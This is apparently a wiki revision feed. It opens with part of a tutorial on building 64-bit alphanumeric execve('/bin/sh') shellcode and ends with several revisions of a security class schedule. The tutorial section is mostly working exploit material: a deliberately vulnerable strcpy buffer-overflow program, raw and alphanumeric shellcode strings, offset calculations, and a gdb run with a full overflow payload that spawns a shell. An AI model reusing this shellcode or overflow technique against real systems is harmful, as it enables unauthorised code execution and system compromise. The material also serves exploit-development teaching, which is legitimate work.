push %rdx<br />
pop %rax<br />
xor %ss:0x30(%rcx), %rax<br />
xor %rax, %ss:0x30(%rcx)<br />
</syntaxhighlight>}}<br />
<br />
As before, xor %rbp into the stack segment and then xor it against rbp to zero. <br />
<br />
{{code|text=<syntaxhighlight lang="asm"><br />
xor %rbp, %ss:0x30(%rcx)<br />
xor %ss:0x30(%rcx), %rbp<br />
</syntaxhighlight>}}<br />
<br />
= 64 bit shellcode: Conversion to alphanumeric code =<br />
* Because of the limited instruction set, the conversion requires many '''mov emulations''' via '''xor''', '''mul''', '''movslq''', '''push''', and '''pop'''.<br />
== bof.c ==<br />
{{info|This is a modified version of bof.c to allow for 200 bytes because the length of the final shellcode exceeds 100 bytes.}}<br />
{{code|text=<source lang="c"><br />
#include <stdlib.h><br />
#include <stdio.h><br />
#include <string.h><br />
<br />
int main(int argc, char *argv[]){<br />
char buffer[200];<br />
strcpy(buffer, argv[1]);<br />
return 0;<br />
}<br />
</source>}}<br />
<br />
== Starting shellcode (64-bit execve /bin/sh) ==<br />
{{info|This was converted to shellcode from the example in 64 bit linux assembly}}<br />
* execve('/bin/sh');<br />
{{code|text=<source lang="asm"><br />
.section .data<br />
.section .text<br />
.globl _start<br />
_start:<br />
<br />
# a function is f(%rdi, %rsi, %rdx, %rcx, %r8, %r9).<br />
# Use zeroed memory to zero out %rsi, %rdi, %rdx<br />
xor %rdi, %rdi<br />
push %rdi<br />
push %rdi<br />
pop %rsi<br />
pop %rdx<br />
<br />
# Store '/bin/sh\0' in %rdi<br />
movq $0x68732f6e69622f6a, %rdi<br />
shr $0x8,%rdi<br />
push %rdi<br />
push %rsp<br />
pop %rdi<br />
push $0x3b<br />
pop %rax<br />
syscall # execve('/bin/sh', null, null)<br />
# function no. is 59/0x3b - execve()<br />
</source>}}<br />
<br />
* execve('/bin/sh') <br />
"\x48\x31\xff\x57\x57\x5e\x5a\x48\xbf\x6a\x2f\x62\x69\x6e\x2f\x73\x68\x48\xc1\xef\x08\x57\x54\x5f\x6a\x3b\x58\x0f\x05"<br />
<br />
== Shellcode Analysis ==<br />
'''Immediately before the syscall:'''<br />
* %rax is set to 0x3b<br />
* %rdi is a pointer to '/bin/sh\0'<br />
* %rsi and %rdx are null<br />
To reproduce this, because the syscall is binary, it must be written to a location that will eventually be executed ahead of currently executing code. The '''xor''' and '''imul''' instructions can then be used to set values on registers.<br />
<br />
==Stack Analysis==<br />
{{info|These buffer dumps have been shortened for brevity and readability.}}<br />
[root@ares bha]# gdb -q ./bof<br />
Reading symbols from /home/hatter/bha/bof...(no debugging symbols found)...done.<br />
(gdb) r $(perl -e 'print "A"x232;')<br />
Starting program: /home/hatter/bha/bof $(perl -e 'print "A"x232;')<br />
Program received signal SIGSEGV, Segmentation fault.<br />
0x0000000000400525 in main ()<br />
(gdb) x/500x $rsp <br />
'''0x7fffffffe3c8''': 0x41414141 0x41414141 0x41414141 0x41414141<br />
0x7fffffffe3d8: 0xffffe400 0x00007fff 0x00000000 0x00000002<br />
..........................<br />
0x7fffffffe708: 0x2f656d6f 0x68726f76 0x2f736565 0x2f616862<br />
0x7fffffffe718: 0x00666f62 '''0x41414141 0x41414141 0x41414141'''<br />
0x7fffffffe728: '''0x41414141 0x41414141 0x41414141 0x41414141'''<br />
<br />
* The formula to determine the offset to begin overwriting data from the stack pointer is '''([[return address]] + [[shellcode]] length) - %rsp'''.<br />
{| class="wikitable"<br />
|-<br />
|'''Operation'''<br />
|<b>Value</b><br />
|<b>Comments</b><br />
|-<br />
|<center><br />
<br />
<br />
'''+'''<br />
<br />
'''-'''</center><br />
|0x7fffffffe726<br />
<br />
0x71<br />
<br />
0x7fffffffe3c8 <br />
|<br />
:[[return address]]<br />
<br />
:[[shellcode]] length (113 characters) <br />
<br />
:%rsp<br />
|-<br />
<br />
|-<br />
|<center>'''='''</center><br />
|<b>0x3cf</b><br />
|<br />
:'''Calculated Offset from %rsp at time of overflow'''<br />
|-<br />
|}<br />
<br />
==The Offset==<br />
* To prepare for '''xor''' and '''imul''' manipulations, 0x5a is placed into %rax and %rsp is moved into %rcx.<br />
{{code|text=<source lang="asm"><br />
# Set %rcx as stack pointer <br />
# and align %rsp <br />
push $0x5a<br />
push %rsp<br />
pop %rcx<br />
pop %rax<br />
</source>}}<br />
* Preparing for imul, an '''xor''' is used to place 0x0f into %rax, then push %rax to the stack.<br />
{{code|text=<source lang="asm"><br />
# Get magic offset and store in %rdi<br />
xor $0x55, %al<br />
push %rax # 0x0f on the stack now.<br />
</source>}}<br />
<br />
* Because 0x41 * 0x0f = 0x3cf (975), the offset can be calculated in purely alphanumeric form. Modify this as code distances itself from the stack pointer during an exploit. The offset is stored in %rdi after setting back the stack pointer.<br />
{{code|text=<source lang="asm"><br />
pop %rax # add back to %esp<br />
imul $0x41, (%rcx), %edi # %rdi = 0x3cf, a "magic offset" for us<br />
</source>}}<br />
<br />
==The Syscall==<br />
* Now that the offset to an address in front of executing instructions has been obtained, 4 bytes must be nulled for the new instructions to be written:<br />
{{code|text=<source lang="asm"><br />
movslq (%rcx,%rdi,1), %rsi<br />
xor %esi, (%rcx,%rdi,1)<br />
</source>}}<br />
<br />
* This next xor comes out to 0x0000050f, which when moved onto the stack becomes 0x0f050000. 0x0f05 is the machine code for a '''syscall'''.<br />
{{code|text=<source lang="asm"><br />
push $0x3030474a<br />
pop %rax<br />
xor $0x30304245, %eax<br />
</source>}}<br />
<br />
* The %rax register now contains 0x050f. Put 0x0f050000 at (%rcx) - then set the stack pointer back.<br />
{{code|text=<source lang="asm"><br />
push %rax<br />
pop %rax # Garbage reg<br />
</source>}}<br />
<br />
* A '''mov emulation''' is used to mov 0x0f05 from (%rcx) to %rcx + %rdi through the %rsi register, writing the syscall instructions:<br />
{{code|text=<source lang="asm"><br />
movslq (%rcx), %rsi<br />
xor %esi, (%rcx,%rdi,1)<br />
</source>}}<br />
<br />
==Arguments==<br />
===Stack Space===<br />
* Zero out a '''qword''' of data starting at %rcx + 0x30 (48 in decimal)<br />
{{code|text=<source lang="asm"><br />
# Allocate stack space<br />
movslq 0x30(%rcx), %rsi<br />
xor %esi, 0x30(%rcx)<br />
movslq 0x34(%rcx), %rsi<br />
xor %esi, 0x34(%rcx)<br />
</source>}}<br />
<br />
===Register Initialization===<br />
* The %rdx, %rdi, and %rsi registers are used for the '''execve()''' syscall. These are zeroed out to initialize their values using the stack space previously allocated.<br />
{{code|text=<source lang="asm"><br />
# Zero rdx, rsi, and rdi<br />
movslq 0x30(%rcx), %rdi<br />
movslq 0x30(%rcx), %rsi<br />
push %rdi<br />
pop %rdx<br />
</source>}}<br />
<br />
===String Argument===<br />
* '''/bin''' is placed onto the stack at the space allocated at %rcx + 0x30.<br />
{{code|text=<source lang="asm"><br />
push $0x5a58555a<br />
pop %rax<br />
xor $0x34313775, %eax<br />
xor %eax, 0x30(%rcx)<br />
</source>}}<br />
* '''/sh\0''' is placed onto the stack at the space allocated at %rcx + 0x34.<br />
{{code|text=<source lang="asm"><br />
push $0x6a51475a<br />
pop %rax<br />
xor $0x6a393475, %eax<br />
xor %eax, 0x34(%rcx) <br />
</source>}}<br />
* '''xor''' is used as a '''mov emulation''' to place '/bin/sh\0' into %rdi.<br />
{{code|text=<source lang="asm"><br />
xor 0x30(%rcx), %rdi<br />
</source>}}<br />
* Set the stack pointer back so %rsp = %rcx + 8 so that the push of %rdi does not overwrite (%rcx). Push '/bin/sh\0'.<br />
{{code|text=<source lang="asm"><br />
pop %rax<br />
push %rdi<br />
</source>}}<br />
<br />
===Final Registers===<br />
* %rsi and %rdx are '''0'''. First, push a byte to meet the sign requirement for '''movslq''', then zero %rdi.<br />
{{code|text=<source lang="asm"><br />
push $0x58<br />
movslq (%rcx), %rdi<br />
xor (%rcx), %rdi <br />
</source>}}<br />
* Align %rsp and %rcx, then use a mov emulation to place %rsp into %rdi. %rdi then contains a pointer to '/bin/sh\0'.<br />
{{code|text=<source lang="asm"><br />
pop %rax<br />
push %rsp<br />
xor (%rcx), %rdi<br />
</source>}}<br />
* %rax is set to 59 or '''0x3b''' for the '''execve()''' syscall.<br />
{{code|text=<source lang="asm"><br />
xor $0x63, %al<br />
</source>}}<br />
'''Final registers:'''<br />
* %rax = 0x3b<br />
* %rdi = pointer to '/bin/sh\0'<br />
* %rsi = null<br />
* %rdx = null<br />
<br />
==Final Code==<br />
* x86_64 alphanumeric execve('/bin/sh',null,null) - 111 bytes:<br />
'''jZTYX4UPXk9AHc49149hJG00X5EB00PXHc1149Hcq01q0Hcq41q4Hcy0Hcq0WZhZUXZX5u7141A0hZGQjX5u49j1A4H3y0XWjXHc9H39XTH394c'''<br />
{{info|Some assemblers prefer the '#' character to the ';' character for comments. User may have to find and replace to get it to assemble properly.}}{{code|text=<source lang="asm"><br />
.global _start<br />
.text<br />
_start:<br />
; Set %rcx as stack pointer <br />
; and align %rsp <br />
push $0x5a<br />
push %rsp<br />
pop %rcx<br />
pop %rax<br />
<br />
; Get magic offset and store in %rdi<br />
xor $0x55, %al<br />
push %rax ; 0x14 on the stack now.<br />
pop %rax ; add back to %esp<br />
imul $0x41, (%rcx), %edi ; %rdi = 0x3cf, a "magic offset" for us<br />
; This is decimal value 975.<br />
; If this is too low/high, suggest a <br />
; modification to xor of %al for <br />
; changing the imul results<br />
<br />
; Write the syscall <br />
movslq (%rcx,%rdi,1), %rsi<br />
xor %esi, (%rcx,%rdi,1) ; 4 bytes have been nulled<br />
push $0x3030474a<br />
pop %rax<br />
xor $0x30304245, %eax<br />
push %rax<br />
pop %rax ; Garbage reg<br />
movslq (%rcx), %rsi<br />
xor %esi, (%rcx,%rdi,1)<br />
<br />
; Sycall written, set values now.<br />
; allocate 8 bytes for '/bin/sh\0'<br />
movslq 0x30(%rcx), %rsi<br />
xor %esi, 0x30(%rcx)<br />
movslq 0x34(%rcx), %rsi<br />
xor %esi, 0x34(%rcx)<br />
<br />
; Zero rdx, rsi, and rdi<br />
movslq 0x30(%rcx), %rdi<br />
movslq 0x30(%rcx), %rsi<br />
push %rdi<br />
pop %rdx<br />
<br />
; Store '/bin/sh\0' in %rdi<br />
push $0x5a58555a<br />
pop %rax<br />
xor $0x34313775, %eax<br />
xor %eax, 0x30(%rcx) ; '/bin' just went onto the stack<br />
<br />
push $0x6a51475a<br />
pop %rax<br />
xor $0x6a393475, %eax<br />
xor %eax, 0x34(%rcx) ; '/sh\0' just went onto the stack<br />
xor 0x30(%rcx), %rdi ; %rdi now contains '/bin/sh\0'<br />
<br />
<br />
pop %rax<br />
push %rdi<br />
<br />
push $0x58<br />
movslq (%rcx), %rdi<br />
xor (%rcx), %rdi ; %rdi zeroed<br />
pop %rax<br />
push %rsp<br />
xor (%rcx), %rdi<br />
xor $0x63, %al</source>}}<br />
<br />
== Successful Overflow Test ==<br />
{{info|This [[shellcode]] was tested on a modified [[Buffer_Overflows#bof.c|bof.c]] to make the buffer 200 bytes in stead of 100 bytes, as the shellcode here exceeds the original buffer size.}}<br />
<br />
[user@host bha]# gdb -q ./bof<br />
Reading symbols from /home/hatter/bha/bof...(no debugging symbols found)...done.<br />
(gdb) r `perl -e 'print "jZTYX4UPXk9AHc49149hJG00X5EB00PXHc1149Hcq01q0Hcq41q4Hcy0Hcq0WZhZUXZX5u7141A0hZGQjX5u49j1A4H3y0XWjXHc9H39XTH394c" . "Y"x105 . "\x26\xe7\xff\xff\xff\x7f";'`<br />
Starting program: /home/hatter/bha/bof `perl -e 'print "jZTYX4UPXk9AHc49149hJG00X5EB00PXHc1149Hcq01q0Hcq41q4Hcy0Hcq0WZhZUXZX5u7141A0hZGQjX5u49j1A4H3y0XWjXHc9H39XTH394c" . "Y"x105 .<br />
"\x26\xe7\xff\xff\xff\x7f";'`<br />
process 28444 is executing new program: /bin/bash<br />
[user@host bha]# uname -m<br />
x86_64<br />
[user@host bha]# exit<br />
exit<br />
[Inferior 1 (process 28444) exited normally]<br />
(gdb) <br />
{{exploitation}}{{programming}}{{social}}<br />
[[Category:Shellcode]]</div>DPYJulietowbaijchttps://nets.ec/index.php?title=Current:Classes&diff=9034Current:Classes2012-09-17T17:43:57Z<p>DPYJulietowbaijc: /* Wednesday - 9/19 */</p>
<hr />
<div>{{info|<center>'''All class and panel times are in UTC-0. Join us in [[IRC]] for lectures and Q&A. (''[http://whattimeisit.com What time is it in UTC?]'')'''</center>}}<br />
<br />
{{social}}<br />
<br />
<br />
'''''Want to teach or participate in a panel?''''' <br />
<br />
:* Make a wiki account<br />
:* Put a link to your user page and topic in the desired time slot.<br />
::* Do not feel constricted to using hour time-blocks, you may use increments of less than one hour.<br />
::* You may book more than one hour if you feel you need it, but please be conservative.<br />
:* '''Come to [[IRC]] during your scheduled course interval'''<br />
<br />
==Requests==<br />
<br />
Place any requests for classes in here, or even ideas for other speakers. Some people want to speak but don't know what to speak about.<br />
<br />
* Heap Overflows<br />
* Integer overflows/underflows<br />
* Null pointer dereference attacks<br />
* Reverse engineering<br />
* Applied cryptography<br />
* Linux distribution comparison\discussion<br />
* Android hardening<br />
<br />
==Monday - 9/17==<br />
<br />
'''00:00 - 01:00''' '''[http://pastebin.com/ZxhqH16C Log]''' ''What is [[SIM|security infrastructure]]?'' - '''[[User:Hatter|hatter]]'''<br />
'''01:00 - 02:00''' '''[http://pastebin.com/9udApQq9 Log]''' ''Introduction to [[Python]]'' - '''[[User:Z|Z]]'''<br />
'''02:00 - 03:00''' '''[http://pastebin.com/aVw7V8YF Log]''' ''Introduction to [[Nmap|network mapping]] Part 1'' - '''[[User:Foo|Foo]]'''<br />
'''03:00 - 04:00''' '''[http://pastebin.com/AXM4sghW Log]''' ''Anonymity Online (or How to be a Ghost)'' - '''[[User:Rorschach|rorschach]]'''<br />
04:00<br />
05:00<br />
06:00<br />
07:00<br />
08:00<br />
09:00<br />
10:00<br />
11:00<br />
12:00<br />
13:00<br />
14:00 <br />
15:00<br />
16:00<br />
17:00<br />
18:00<br />
19:00<br />
20:00<br />
21:00<br />
22:00<br />
23:00<br />
<br />
==Tuesday - 9/18==<br />
'''00:00 - 01:00''' ''Remote [[SQL injection]] testing'' - '''[[User:Hatter|hatter]]'''<br />
'''01:00 - 02:00''' ''Introduction to [[Python]] (cont.)'' - '''[[User:z|z]]'''<br />
'''02:00 - 03:00''' ''Introduction to [[Nmap|network mapping]] Part 2'' - '''[[User:Foo|Foo]]'''<br />
03:00<br />
04:00<br />
05:00<br />
06:00<br />
07:00<br />
08:00<br />
09:00<br />
10:00<br />
11:00<br />
12:00<br />
13:00<br />
14:00 <br />
15:00<br />
16:00<br />
17:00<br />
18:00<br />
19:00<br />
20:00<br />
21:00<br />
22:00<br />
23:00<br />
<br />
==Wednesday - 9/19==<br />
'''00:00 - 01:00''' ''Introduction to Assembly Code'' - '''[[User:M4tr1c3s|m4]]'''<br />
'''01:00 - 02:00''' ''An introduction to the [[User:Hatter/ELF format|ELF Format]]'' - '''[[User:Hatter|hatter]]'''<br />
02:00<br />
03:00<br />
04:00<br />
05:00<br />
06:00<br />
07:00<br />
08:00<br />
09:00<br />
10:00<br />
11:00<br />
12:00<br />
13:00<br />
14:00 <br />
15:00<br />
16:00<br />
17:00<br />
18:00<br />
19:00<br />
'''20:00 - 21:00''' ''Introduction to Ptrace'' -- '''[[User:Rorschach|rorschach]]'''<br />
21:00<br />
22:00<br />
23:00<br />
<br />
==Thursday - 9/20==<br />
'''00:00 - 01:00''' ''[[Shellcode]] panel'' - '''[[User:Hatter|hatter]]'''<br />
01:00<br />
02:00<br />
03:00<br />
04:00<br />
05:00<br />
06:00<br />
07:00<br />
08:00<br />
09:00<br />
10:00<br />
11:00<br />
12:00<br />
13:00<br />
14:00 <br />
15:00<br />
16:00<br />
17:00<br />
18:00<br />
19:00<br />
20:00<br />
21:00<br />
22:00<br />
23:00<br />
<br />
==Friday - 9/21==<br />
'''00:00 - 01:00''' ''Intermediate [[User:Hatter/shellcode|shellcoding]]'' - '''[[User:Hatter|hatter]]'''<br />
01:00<br />
02:00<br />
03:00<br />
04:00<br />
05:00<br />
06:00<br />
07:00<br />
08:00<br />
09:00<br />
10:00<br />
11:00<br />
12:00<br />
13:00<br />
14:00 <br />
15:00<br />
16:00<br />
17:00<br />
18:00<br />
19:00<br />
20:00<br />
'''21:00 - 22:00''' ''Introduction to GDB'' -- '''[[User:Rorschach|rorschach]]'''<br />
22:00<br />
23:00</div>DPYJulietowbaijchttps://nets.ec/index.php?title=Current:Classes&diff=9027Current:Classes2012-09-17T17:32:09Z<p>DPYJulietowbaijc: /* Wednesday - 9/19 */</p>
<hr />
<div>All class and panel times are in UTC-0. Join us in [[IRC]] for lectures and Q&A. (''[http://whattimeisit.com What time is it in UTC?]'')<br />
All class and panel times are in UTC-0. Join us in [[IRC]] for lectures and Q&A. (''[http://whattimeisit.com What time is it in UTC?]'')<br />
<br />
'''''Want to teach or participate in a panel?''''' <br />
<br />
:* Make a wiki account<br />
:* Put a link to your user page and topic in the desired time slot.<br />
::* Do not feel constricted to using hour time-blocks, you may use increments of less than one hour.<br />
::* You may book more than one hour if you feel you need it, but please be conservative.<br />
:* '''Come to [[IRC]] during your scheduled course interval'''<br />
<br />
==Requests==<br />
<br />
Place any requests for classes in here, or even ideas for other speakers. Some people want to speak but don't know what to speak about.<br />
<br />
* Heap Overflows<br />
* Integer overflows/underflows<br />
* Null pointer dereference attacks<br />
* Reverse engineering<br />
* Applied cryptography<br />
* Linux distribution comparison\discussion<br />
* Android hardening<br />
<br />
==Monday - 9/17==<br />
<br />
'''00:00 - 01:00''' '''[http://pastebin.com/ZxhqH16C Log]''' ''What is [[SIM|security infrastructure]]?'' - '''[[User:Hatter|hatter]]'''<br />
'''01:00 - 02:00''' '''[http://pastebin.com/9udApQq9 Log]''' ''Introduction to [[Python]]'' - '''[[User:Z|Z]]'''<br />
'''02:00 - 03:00''' '''[http://pastebin.com/aVw7V8YF Log]''' ''Introduction to [[Nmap|network mapping]] Part 1'' - '''[[User:Foo|Foo]]'''<br />
'''03:00 - 04:00''' '''[http://pastebin.com/AXM4sghW Log]''' ''Anonymity Online (or How to be a Ghost)'' - '''[[User:Rorschach|rorschach]]'''<br />
04:00<br />
05:00<br />
06:00<br />
07:00<br />
08:00<br />
09:00<br />
10:00<br />
11:00<br />
12:00<br />
13:00<br />
14:00 <br />
15:00<br />
16:00<br />
17:00<br />
18:00<br />
19:00<br />
20:00<br />
21:00<br />
22:00<br />
23:00<br />
<br />
==Tuesday - 9/18==<br />
'''00:00 - 01:00''' ''Remote [[SQL injection]] testing'' - '''[[User:Hatter|hatter]]'''<br />
'''01:00 - 02:00''' ''Introduction to [[Python]] (cont.)'' - '''[[User:z|z]]'''<br />
'''02:00 - 03:00''' ''Introduction to [[Nmap|network mapping]] Part 2'' - '''[[User:Foo|Foo]]'''<br />
03:00<br />
04:00<br />
05:00<br />
06:00<br />
07:00<br />
08:00<br />
09:00<br />
10:00<br />
11:00<br />
12:00<br />
13:00<br />
14:00 <br />
15:00<br />
16:00<br />
17:00<br />
18:00<br />
19:00<br />
20:00<br />
21:00<br />
22:00<br />
23:00<br />
<br />
==Wednesday - 9/19==<br />
'''00:00 - 01:00''' ''Introduction to Assembly Code'' - '''[[User:M4tr1c3s|m4]]'''<br />
'''01:00 - 02:00''' ''An introduction to the [[User:Hatter/ELF format|ELF Format]]'' - '''[[User:Hatter|hatter]]'''<br />
01:00<br />
02:00<br />
03:00<br />
04:00<br />
05:00<br />
06:00<br />
07:00<br />
08:00<br />
09:00<br />
10:00<br />
11:00<br />
12:00<br />
13:00<br />
14:00 <br />
15:00<br />
16:00<br />
17:00<br />
18:00<br />
19:00<br />
'''20:00 - 21:00''' ''Introduction to Ptrace'' -- '''[[User:Rorschach|rorschach]]'''<br />
21:00<br />
22:00<br />
23:00<br />
<br />
==Thursday - 9/20==<br />
'''00:00 - 01:00''' ''[[Shellcode]] panel'' - '''[[User:Hatter|hatter]]'''<br />
01:00<br />
02:00<br />
03:00<br />
04:00<br />
05:00<br />
06:00<br />
07:00<br />
08:00<br />
09:00<br />
10:00<br />
11:00<br />
12:00<br />
13:00<br />
14:00 <br />
15:00<br />
16:00<br />
17:00<br />
18:00<br />
19:00<br />
20:00<br />
21:00<br />
22:00<br />
23:00<br />
<br />
==Friday - 9/21==<br />
'''00:00 - 01:00''' ''Intermediate [[User:Hatter/shellcode|shellcoding]]'' - '''[[User:Hatter|hatter]]'''<br />
01:00<br />
02:00<br />
03:00<br />
04:00<br />
05:00<br />
06:00<br />
07:00<br />
08:00<br />
09:00<br />
10:00<br />
11:00<br />
12:00<br />
13:00<br />
14:00 <br />
15:00<br />
16:00<br />
17:00<br />
18:00<br />
19:00<br />
20:00<br />
'''21:00 - 22:00''' ''Introduction to GDB'' -- '''[[User:Rorschach|rorschach]]'''<br />
22:00<br />
23:00</div>DPYJulietowbaijchttps://nets.ec/index.php?title=Current:Classes&diff=9026Current:Classes2012-09-17T17:30:57Z<p>DPYJulietowbaijc: /* Tuesday - 9/18 */</p>
<hr />
<div>All class and panel times are in UTC-0. Join us in [[IRC]] for lectures and Q&A. (''[http://whattimeisit.com What time is it in UTC?]'')<br />
All class and panel times are in UTC-0. Join us in [[IRC]] for lectures and Q&A. (''[http://whattimeisit.com What time is it in UTC?]'')<br />
<br />
'''''Want to teach or participate in a panel?''''' <br />
<br />
:* Make a wiki account<br />
:* Put a link to your user page and topic in the desired time slot.<br />
::* Do not feel constricted to using hour time-blocks, you may use increments of less than one hour.<br />
::* You may book more than one hour if you feel you need it, but please be conservative.<br />
:* '''Come to [[IRC]] during your scheduled course interval'''<br />
<br />
==Requests==<br />
<br />
Place any requests for classes in here, or even ideas for other speakers. Some people want to speak but don't know what to speak about.<br />
<br />
* Heap Overflows<br />
* Integer overflows/underflows<br />
* Null pointer dereference attacks<br />
* Reverse engineering<br />
* Applied cryptography<br />
* Linux distribution comparison\discussion<br />
* Android hardening<br />
<br />
==Monday - 9/17==<br />
<br />
'''00:00 - 01:00''' '''[http://pastebin.com/ZxhqH16C Log]''' ''What is [[SIM|security infrastructure]]?'' - '''[[User:Hatter|hatter]]'''<br />
'''01:00 - 02:00''' '''[http://pastebin.com/9udApQq9 Log]''' ''Introduction to [[Python]]'' - '''[[User:Z|Z]]'''<br />
'''02:00 - 03:00''' '''[http://pastebin.com/aVw7V8YF Log]''' ''Introduction to [[Nmap|network mapping]] Part 1'' - '''[[User:Foo|Foo]]'''<br />
'''03:00 - 04:00''' '''[http://pastebin.com/AXM4sghW Log]''' ''Anonymity Online (or How to be a Ghost)'' - '''[[User:Rorschach|rorschach]]'''<br />
04:00<br />
05:00<br />
06:00<br />
07:00<br />
08:00<br />
09:00<br />
10:00<br />
11:00<br />
12:00<br />
13:00<br />
14:00 <br />
15:00<br />
16:00<br />
17:00<br />
18:00<br />
19:00<br />
20:00<br />
21:00<br />
22:00<br />
23:00<br />
<br />
==Tuesday - 9/18==<br />
'''00:00 - 01:00''' ''Remote [[SQL injection]] testing'' - '''[[User:Hatter|hatter]]'''<br />
'''01:00 - 02:00''' ''Introduction to [[Python]] (cont.)'' - '''[[User:z|z]]'''<br />
'''02:00 - 03:00''' ''Introduction to [[Nmap|network mapping]] Part 2'' - '''[[User:Foo|Foo]]'''<br />
03:00<br />
04:00<br />
05:00<br />
06:00<br />
07:00<br />
08:00<br />
09:00<br />
10:00<br />
11:00<br />
12:00<br />
13:00<br />
14:00 <br />
15:00<br />
16:00<br />
17:00<br />
18:00<br />
19:00<br />
20:00<br />
21:00<br />
22:00<br />
23:00<br />
<br />
==Wednesday - 9/19==<br />
'''00:00 - 01:00''' ''An introduction to the [[User:Hatter/ELF format|ELF Format]]'' - '''[[User:Hatter|hatter]]'''<br />
01:00<br />
02:00<br />
03:00<br />
04:00<br />
05:00<br />
06:00<br />
07:00<br />
08:00<br />
09:00<br />
10:00<br />
11:00<br />
12:00<br />
13:00<br />
14:00 <br />
15:00<br />
16:00<br />
17:00<br />
18:00<br />
19:00<br />
'''20:00 - 21:00''' ''Introduction to Ptrace'' -- '''[[User:Rorschach|rorschach]]'''<br />
21:00<br />
22:00<br />
23:00<br />
<br />
==Thursday - 9/20==<br />
'''00:00 - 01:00''' ''[[Shellcode]] panel'' - '''[[User:Hatter|hatter]]'''<br />
01:00<br />
02:00<br />
03:00<br />
04:00<br />
05:00<br />
06:00<br />
07:00<br />
08:00<br />
09:00<br />
10:00<br />
11:00<br />
12:00<br />
13:00<br />
14:00 <br />
15:00<br />
16:00<br />
17:00<br />
18:00<br />
19:00<br />
20:00<br />
21:00<br />
22:00<br />
23:00<br />
<br />
==Friday - 9/21==<br />
'''00:00 - 01:00''' ''Intermediate [[User:Hatter/shellcode|shellcoding]]'' - '''[[User:Hatter|hatter]]'''<br />
01:00<br />
02:00<br />
03:00<br />
04:00<br />
05:00<br />
06:00<br />
07:00<br />
08:00<br />
09:00<br />
10:00<br />
11:00<br />
12:00<br />
13:00<br />
14:00 <br />
15:00<br />
16:00<br />
17:00<br />
18:00<br />
19:00<br />
20:00<br />
'''21:00 - 22:00''' ''Introduction to GDB'' -- '''[[User:Rorschach|rorschach]]'''<br />
22:00<br />
23:00</div>DPYJulietowbaijchttps://nets.ec/index.php?title=Current:Classes&diff=9025Current:Classes2012-09-17T17:29:01Z<p>DPYJulietowbaijc: </p>
<hr />
<div>All class and panel times are in UTC-0. Join us in [[IRC]] for lectures and Q&A. (''[http://whattimeisit.com What time is it in UTC?]'')<br />
All class and panel times are in UTC-0. Join us in [[IRC]] for lectures and Q&A. (''[http://whattimeisit.com What time is it in UTC?]'')<br />
<br />
'''''Want to teach or participate in a panel?''''' <br />
<br />
:* Make a wiki account<br />
:* Put a link to your user page and topic in the desired time slot.<br />
::* Do not feel constricted to using hour time-blocks, you may use increments of less than one hour.<br />
::* You may book more than one hour if you feel you need it, but please be conservative.<br />
:* '''Come to [[IRC]] during your scheduled course interval'''<br />
<br />
==Requests==<br />
<br />
Place any requests for classes in here, or even ideas for other speakers. Some people want to speak but don't know what to speak about.<br />
<br />
* Heap Overflows<br />
* Integer overflows/underflows<br />
* Null pointer dereference attacks<br />
* Reverse engineering<br />
* Applied cryptography<br />
* Linux distribution comparison\discussion<br />
* Android hardening<br />
<br />
==Monday - 9/17==<br />
<br />
'''00:00 - 01:00''' '''[http://pastebin.com/ZxhqH16C Log]''' ''What is [[SIM|security infrastructure]]?'' - '''[[User:Hatter|hatter]]'''<br />
'''01:00 - 02:00''' '''[http://pastebin.com/9udApQq9 Log]''' ''Introduction to [[Python]]'' - '''[[User:Z|Z]]'''<br />
'''02:00 - 03:00''' '''[http://pastebin.com/aVw7V8YF Log]''' ''Introduction to [[Nmap|network mapping]] Part 1'' - '''[[User:Foo|Foo]]'''<br />
'''03:00 - 04:00''' '''[http://pastebin.com/AXM4sghW Log]''' ''Anonymity Online (or How to be a Ghost)'' - '''[[User:Rorschach|rorschach]]'''<br />
04:00<br />
05:00<br />
06:00<br />
07:00<br />
08:00<br />
09:00<br />
10:00<br />
11:00<br />
12:00<br />
13:00<br />
14:00 <br />
15:00<br />
16:00<br />
17:00<br />
18:00<br />
19:00<br />
20:00<br />
21:00<br />
22:00<br />
23:00<br />
<br />
==Tuesday - 9/18==<br />
'''00:00 - 01:00''' ''Remote [[SQL injection]] testing'' - '''[[User:Hatter|hatter]]'''<br />
'''01:00 - 02:00''' ''Introduction to [[Python]] (cont.)'' - '''[[User:z|z]]'''<br />
'''02:00 - 03:00''' ''Introduction to [[Nmap|network mapping]] Part 2'' - '''[[User:Foo|Foo]]'''<br />
03:00<br />
04:00<br />
05:00<br />
06:00<br />
07:00<br />
08:00<br />
09:00<br />
10:00<br />
11:00<br />
12:00<br />
13:00<br />
14:00 <br />
15:00<br />
16:00<br />
17:00<br />
18:00<br />
19:00<br />
20:00<br />
'''21:00 - 22:00''' ''Assembly Introduction'' - '''[[User:M4tr1c3s|m4]]'''<br />
23:00<br />
<br />
==Wednesday - 9/19==<br />
'''00:00 - 01:00''' ''An introduction to the [[User:Hatter/ELF format|ELF Format]]'' - '''[[User:Hatter|hatter]]'''<br />
01:00<br />
02:00<br />
03:00<br />
04:00<br />
05:00<br />
06:00<br />
07:00<br />
08:00<br />
09:00<br />
10:00<br />
11:00<br />
12:00<br />
13:00<br />
14:00 <br />
15:00<br />
16:00<br />
17:00<br />
18:00<br />
19:00<br />
'''20:00 - 21:00''' ''Introduction to Ptrace'' -- '''[[User:Rorschach|rorschach]]'''<br />
21:00<br />
22:00<br />
23:00<br />
<br />
==Thursday - 9/20==<br />
'''00:00 - 01:00''' ''[[Shellcode]] panel'' - '''[[User:Hatter|hatter]]'''<br />
01:00<br />
02:00<br />
03:00<br />
04:00<br />
05:00<br />
06:00<br />
07:00<br />
08:00<br />
09:00<br />
10:00<br />
11:00<br />
12:00<br />
13:00<br />
14:00 <br />
15:00<br />
16:00<br />
17:00<br />
18:00<br />
19:00<br />
20:00<br />
21:00<br />
22:00<br />
23:00<br />
<br />
==Friday - 9/21==<br />
'''00:00 - 01:00''' ''Intermediate [[User:Hatter/shellcode|shellcoding]]'' - '''[[User:Hatter|hatter]]'''<br />
01:00<br />
02:00<br />
03:00<br />
04:00<br />
05:00<br />
06:00<br />
07:00<br />
08:00<br />
09:00<br />
10:00<br />
11:00<br />
12:00<br />
13:00<br />
14:00 <br />
15:00<br />
16:00<br />
17:00<br />
18:00<br />
19:00<br />
20:00<br />
'''21:00 - 22:00''' ''Introduction to GDB'' -- '''[[User:Rorschach|rorschach]]'''<br />
22:00<br />
23:00</div>DPYJulietowbaijchttps://nets.ec/index.php?title=User:Hatter/getting_started&diff=7764User:Hatter/getting started2012-07-02T13:53:54Z<p>DPYJulietowbaijc: /* Code */</p>
<hr />
